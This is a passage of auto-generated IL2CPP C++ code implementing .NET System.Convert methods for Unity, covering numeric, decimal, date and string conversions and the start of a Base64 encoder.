Convert_ToSingle_mDADB8C1C52121EE8B0040D4E5FC7CFD2CFAD8B80 (double ___value0, const RuntimeMethod* method) { { double L_0 = ___value0; return (((float)((float)L_0))); } } // System.Single System.Convert::ToSingle(System.Decimal) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_mB30A36F02973B8210209CA62F2DD7B212857845A (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToSingle_mB30A36F02973B8210209CA62F2DD7B212857845A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); float L_1 = Decimal_op_Explicit_mC7ED730AE7C6D42F19F06246B242E8B60EDDAC62(L_0, /*hidden argument*/NULL); return (((float)((float)L_1))); } } // System.Single System.Convert::ToSingle(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m5F3E5F42FE95CB24ADF3164009FF7136DB1CE888 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0009; } } { return (0.0f); } IL_0009: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; float L_3 = Single_Parse_m6D591682F5EF2ED4D1CEADF65728E965A739AE74(L_1, ((int32_t)231), L_2, /*hidden argument*/NULL); return L_3; } } // System.Single System.Convert::ToSingle(System.Boolean) extern "C" IL2CPP_METHOD_ATTR float Convert_ToSingle_m8C04F9D9C974F7AD8B41E87B5419FFA9EB9C88E7 (bool ___value0, const RuntimeMethod* method) { int32_t G_B3_0 = 0; { bool L_0 = ___value0; if (L_0) { goto IL_0006; } } { G_B3_0 = 0; goto IL_0007; } IL_0006: { G_B3_0 = 1; } IL_0007: { return (((float)((float)G_B3_0))); } } // System.Double System.Convert::ToDouble(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m053A47D87C59CA7A87D4E67E5E06368D775D7651 (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDouble_m053A47D87C59CA7A87D4E67E5E06368D775D7651_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; double L_3 = InterfaceFuncInvoker1< double, RuntimeObject* >::Invoke(12 /* System.Double System.IConvertible::ToDouble(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return (0.0); } } // System.Double System.Convert::ToDouble(System.SByte) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m236422548F1BC40280491F59EBD3D1B22AA84F97 (int8_t ___value0, const RuntimeMethod* method) { { int8_t L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.Byte) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_mFB12B649AA6A4D71FDA6BD62D88FD785E2452FA5 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.Int16) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m9FFE6DC9FE9E17546E9681806ED4613D582A2D6C (int16_t ___value0, const RuntimeMethod* method) { { int16_t L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.UInt16) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m5427641E8803E839561F9C10071C3E33A1A6F854 (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.Int32) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_mAE52754212671CD42E2C67BD9ABCE18DAEE443CC (int32_t ___value0, const RuntimeMethod* method) { { int32_t L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.UInt32) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_mA48AAD04072EF9CD5A30C2B2EC69A796A0BA6194 (uint32_t ___value0, const RuntimeMethod* method) { { uint32_t L_0 = ___value0; return (((double)((double)(((double)((uint32_t)L_0)))))); } } // System.Double System.Convert::ToDouble(System.Int64) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m5948DF15E5B6EAE3A3D443BB5DAB6D6BF5D4E785 (int64_t ___value0, const RuntimeMethod* method) { { int64_t L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.UInt64) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m18E2BC69DA3D88A0C5CD258FFBF1DB5BA097C316 (uint64_t ___value0, const RuntimeMethod* method) { { uint64_t L_0 = ___value0; return (((double)((double)(((double)((uint64_t)L_0)))))); } } // System.Double System.Convert::ToDouble(System.Single) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m80148DF46C72C989F186F0616EDE71A34BA3A967 (float ___value0, const RuntimeMethod* method) { { float L_0 = ___value0; return (((double)((double)L_0))); } } // System.Double System.Convert::ToDouble(System.Decimal) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_mB31B6067B5E9336860641CBD4424E17CA42EC3FA (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDouble_mB31B6067B5E9336860641CBD4424E17CA42EC3FA_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); double L_1 = Decimal_op_Explicit_mB7F34E3B2DFB6211CA5ACB5497DA6CDCB09FC6CE(L_0, /*hidden argument*/NULL); return (((double)((double)L_1))); } } // System.Double System.Convert::ToDouble(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_m8EAF69AB183D6DF604898A3EDE5A27A4AFBFF1D8 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDouble_m8EAF69AB183D6DF604898A3EDE5A27A4AFBFF1D8_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_000d; } } { return (0.0); } IL_000d: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(Double_t358B8F23BDC52A5DD700E727E204F9F7CDE12409_il2cpp_TypeInfo_var); double L_3 = Double_Parse_m52FA2C773282C04605DA871AC7093A66FA8A746B(L_1, ((int32_t)231), L_2, /*hidden argument*/NULL); return L_3; } } // System.Double System.Convert::ToDouble(System.Boolean) extern "C" IL2CPP_METHOD_ATTR double Convert_ToDouble_mF6258103D74509D52040BECC84FB241B09B6CC62 (bool ___value0, const RuntimeMethod* method) { int32_t G_B3_0 = 0; { bool L_0 = ___value0; if (L_0) { goto IL_0006; } } { G_B3_0 = 0; goto IL_0007; } IL_0006: { G_B3_0 = 1; } IL_0007: { return (((double)((double)G_B3_0))); } } // System.Decimal System.Convert::ToDecimal(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mD8F65E8B251DBE61789CAD032172D089375D1E5B (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mD8F65E8B251DBE61789CAD032172D089375D1E5B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_3 = InterfaceFuncInvoker1< Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 , RuntimeObject* >::Invoke(13 /* System.Decimal System.IConvertible::ToDecimal(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_4 = ((Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields*)il2cpp_codegen_static_fields_for(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var))->get_Zero_7(); return L_4; } } // System.Decimal System.Convert::ToDecimal(System.SByte) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_m4AC31B36EF41A7409233DEDB9389EA97FB981FDA (int8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_m4AC31B36EF41A7409233DEDB9389EA97FB981FDA_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int8_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m8519381573914335A82DE5D3D06FA85E89D89197(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.Byte) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_m22A4086CA96BD7E3E1D23660A838AFA0F48946D6 (uint8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_m22A4086CA96BD7E3E1D23660A838AFA0F48946D6_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint8_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m466EC50EE380238E9F804EE13EF1A2EF7B310DC6(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.Int16) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mD9355C906353F7E283024449544616979EF4823E (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mD9355C906353F7E283024449544616979EF4823E_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m9A27DB673EFE87795196E83A6D91139A491252E6(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.UInt16) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mFD0BC78E6BE4EDBFD7A0767E7D95A39E40F0260F (uint16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mFD0BC78E6BE4EDBFD7A0767E7D95A39E40F0260F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint16_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_mEF0CA15B0C83BC57C2206E366FBAE3FF552FEF28(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.Int32) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_m707FBD6E1B6D6F7F71D1D492C5F5AE981B561DEF (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_m707FBD6E1B6D6F7F71D1D492C5F5AE981B561DEF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m654C5710B68EAA7C5E606F28F084CE5FDA339415(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.UInt32) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_m291E4FE569EB911F06EF4269522C1DA0BEB7CB5F (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_m291E4FE569EB911F06EF4269522C1DA0BEB7CB5F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m2220445E5E4C0CC7715EEC07C0F7417097FD4141(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.Int64) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mECE2EDC28EBA5F0B88702C15D0A3A1DABEE8D6A1 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mECE2EDC28EBA5F0B88702C15D0A3A1DABEE8D6A1_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_mFD66E10F50DE6B69A137279140DD74487572827D(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.UInt64) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mC4A6FC31B0F2C506D113380567B082CCB6A4FEED (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mC4A6FC31B0F2C506D113380567B082CCB6A4FEED_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m2C34640E22DCDAB44B7135AE81E8D480C0CCF556(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.Single) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_m0723C02BC98733C38A826B8BBF2C4AE24B7CB557 (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_m0723C02BC98733C38A826B8BBF2C4AE24B7CB557_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Explicit_m9AE85BFCE75391680A7D4EA28FF4D42959F37E39(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.Double) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mF93A2E5C1006C59187BA8F1F17E66CEC2D8F7FCE (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mF93A2E5C1006C59187BA8F1F17E66CEC2D8F7FCE_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Explicit_m2EB423334931E2E5B03C2A91D98E1EB8E28FCC0A(L_0, /*hidden argument*/NULL); return L_1; } } // System.Decimal System.Convert::ToDecimal(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_m80616EA9DCA3177D13755D16D12FE16F7EF93D6B (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_m80616EA9DCA3177D13755D16D12FE16F7EF93D6B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_0009; } } { IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = ((Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_StaticFields*)il2cpp_codegen_static_fields_for(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var))->get_Zero_7(); return L_1; } IL_0009: { String_t* L_2 = ___value0; RuntimeObject* L_3 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_4 = Decimal_Parse_mFA9697AFBA5C224F2F6D08275B904E9DDBFE607A(L_2, ((int32_t)111), L_3, /*hidden argument*/NULL); return L_4; } } // System.Decimal System.Convert::ToDecimal(System.Boolean) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 Convert_ToDecimal_mF2C5F32DF4C8DC0938C223031CDDF4AC1E08A0CC (bool ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDecimal_mF2C5F32DF4C8DC0938C223031CDDF4AC1E08A0CC_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t G_B3_0 = 0; { bool L_0 = ___value0; if (L_0) { goto IL_0006; } } { G_B3_0 = 0; goto IL_0007; } IL_0006: { G_B3_0 = 1; } IL_0007: { IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_op_Implicit_m654C5710B68EAA7C5E606F28F084CE5FDA339415(G_B3_0, /*hidden argument*/NULL); return L_1; } } // System.DateTime System.Convert::ToDateTime(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 Convert_ToDateTime_m57803D920D7F8261F00652A19DD01E530A530795 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToDateTime_m57803D920D7F8261F00652A19DD01E530A530795_MetadataUsageId); s_Il2CppMethodInitialized = true; } { String_t* L_0 = ___value0; if (L_0) { goto IL_000b; } } { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_1; memset(&L_1, 0, sizeof(L_1)); DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C((&L_1), (((int64_t)((int64_t)0))), /*hidden argument*/NULL); return L_1; } IL_000b: { String_t* L_2 = ___value0; RuntimeObject* L_3 = ___provider1; IL2CPP_RUNTIME_CLASS_INIT(DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132_il2cpp_TypeInfo_var); DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 L_4 = DateTime_Parse_mFB11F5C0061CEAD9A2F51E3814DEBE0475F2BA37(L_2, L_3, /*hidden argument*/NULL); return L_4; } } // System.String System.Convert::ToString(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* Convert_ToString_m10FC2E5535B944C2DFE83E6D2659122C9408F0FF (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToString_m10FC2E5535B944C2DFE83E6D2659122C9408F0FF_MetadataUsageId); s_Il2CppMethodInitialized = true; } RuntimeObject* V_0 = NULL; RuntimeObject* V_1 = NULL; { RuntimeObject * L_0 = ___value0; V_0 = ((RuntimeObject*)IsInst((RuntimeObject*)L_0, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)); RuntimeObject* L_1 = V_0; if (!L_1) { goto IL_0012; } } { RuntimeObject* L_2 = V_0; RuntimeObject* L_3 = ___provider1; String_t* L_4 = InterfaceFuncInvoker1< String_t*, RuntimeObject* >::Invoke(15 /* System.String System.IConvertible::ToString(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, L_2, L_3); return L_4; } IL_0012: { RuntimeObject * L_5 = ___value0; V_1 = ((RuntimeObject*)IsInst((RuntimeObject*)L_5, IFormattable_t58E0883927AD7B9E881837942BD4FA2E7D8330C0_il2cpp_TypeInfo_var)); RuntimeObject* L_6 = V_1; if (!L_6) { goto IL_0025; } } { RuntimeObject* L_7 = V_1; RuntimeObject* L_8 = ___provider1; String_t* L_9 = InterfaceFuncInvoker2< String_t*, String_t*, RuntimeObject* >::Invoke(0 /* System.String System.IFormattable::ToString(System.String,System.IFormatProvider) */, IFormattable_t58E0883927AD7B9E881837942BD4FA2E7D8330C0_il2cpp_TypeInfo_var, L_7, (String_t*)NULL, L_8); return L_9; } IL_0025: { RuntimeObject * L_10 = ___value0; if (!L_10) { goto IL_002f; } } { RuntimeObject * L_11 = ___value0; String_t* L_12 = VirtFuncInvoker0< String_t* >::Invoke(3 /* System.String System.Object::ToString() */, L_11); return L_12; } IL_002f: { String_t* L_13 = ((String_t_StaticFields*)il2cpp_codegen_static_fields_for(String_t_il2cpp_TypeInfo_var))->get_Empty_5(); return L_13; } } // System.String System.Convert::ToString(System.Char,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* Convert_ToString_m19979FD8FCD84DC6CFBF835D7666956E5138467B (Il2CppChar ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { RuntimeObject* L_0 = ___provider1; String_t* L_1 = Char_ToString_mF758476EBA0494508C18E74ADF20D7732A872BDE((Il2CppChar*)(&___value0), L_0, /*hidden argument*/NULL); return L_1; } } // System.String System.Convert::ToString(System.Int32,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR String_t* Convert_ToString_m013DD2590D9DCBA00A8A4FEEBE7FC2DBD4DDBC70 (int32_t ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { RuntimeObject* L_0 = ___provider1; String_t* L_1 = Int32_ToString_m1D0AF82BDAB5D4710527DD3FEFA6F01246D128A5((int32_t*)(&___value0), L_0, /*hidden argument*/NULL); return L_1; } } // System.Int32 System.Convert::ToInt32(System.String,System.Int32) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m8DC81C7C49EE4A9334E71E45E3A220644E45B4F4 (String_t* ___value0, int32_t ___fromBase1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m8DC81C7C49EE4A9334E71E45E3A220644E45B4F4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___fromBase1; if ((((int32_t)L_0) == ((int32_t)2))) { goto IL_0022; } } { int32_t L_1 = ___fromBase1; if ((((int32_t)L_1) == ((int32_t)8))) { goto IL_0022; } } { int32_t L_2 = ___fromBase1; if ((((int32_t)L_2) == ((int32_t)((int32_t)10)))) { goto IL_0022; } } { int32_t L_3 = ___fromBase1; if ((((int32_t)L_3) == ((int32_t)((int32_t)16)))) { goto IL_0022; } } { String_t* L_4 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteralAA7B479BCC9583E2D72A7A34D71FA9ACF67B076D, /*hidden argument*/NULL); ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 * L_5 = (ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1 *)il2cpp_codegen_object_new(ArgumentException_tEDCD16F20A09ECE461C3DA766C16EDA8864057D1_il2cpp_TypeInfo_var); ArgumentException__ctor_m9A85EF7FEFEC21DDD525A67E831D77278E5165B7(L_5, L_4, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_5, NULL, Convert_ToInt32_m8DC81C7C49EE4A9334E71E45E3A220644E45B4F4_RuntimeMethod_var); } IL_0022: { String_t* L_6 = ___value0; int32_t L_7 = ___fromBase1; int32_t L_8 = ParseNumbers_StringToInt_m4EB636CC7D3D970B1409CA4AA0336AB33B2DF39F(L_6, L_7, ((int32_t)4096), /*hidden argument*/NULL); return L_8; } } // System.String System.Convert::ToBase64String(System.Byte[]) extern "C" IL2CPP_METHOD_ATTR String_t* Convert_ToBase64String_mF201749AD724C437524C8A6108519470A0F65B84 (ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* ___inArray0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToBase64String_mF201749AD724C437524C8A6108519470A0F65B84_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_0 = ___inArray0; if (L_0) { goto IL_000e; } } { ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD * L_1 = (ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD *)il2cpp_codegen_object_new(ArgumentNullException_t581DF992B1F3E0EC6EFB30CC5DC43519A79B27AD_il2cpp_TypeInfo_var); ArgumentNullException__ctor_mEE0C0D6FCB2D08CD7967DBB1329A0854BBED49ED(L_1, _stringLiteralB3337829708B47BA30EF6CB0D62B0BC7364C36F9, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_1, NULL, Convert_ToBase64String_mF201749AD724C437524C8A6108519470A0F65B84_RuntimeMethod_var); } IL_000e: { ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821* L_2 = ___inArray0; 